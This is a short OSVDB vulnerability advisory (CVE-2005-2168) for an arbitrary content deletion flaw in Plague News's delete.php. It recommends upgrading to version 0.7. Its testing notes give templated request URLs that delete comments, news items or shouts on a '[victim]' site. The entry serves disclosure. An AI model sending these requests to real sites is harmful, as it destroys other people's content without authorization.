Plague News delete.php Arbitrary Content Deletion

2005-06-01T23:41:56
ID OSVDB:17686
Type osvdb
Reporter OSVDB
Modified 2005-06-01T23:41:56

Description

Solution Description

Upgrade to version 0.7 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

Manual Testing Notes

http://[victim]/delete.php?comment=1&id=[ID ff comment here] http://[victim]/delete.php?news=1&id=[ID of news here] http://[victim]/delete.php?shout=1&id=[ID of shout here]

References:

Vendor URL: http://frozenplague.net/ Vendor Specific News/Changelog Entry: http://frozenplague.net/bb/viewtopic.php?t=31 Secunia Advisory ID:15902 Related OSVDB ID: 17687 Related OSVDB ID: 17688 Other Advisory URL: http://dark-assassins.com/forum/viewtopic.php?t=90 CVE-2005-2168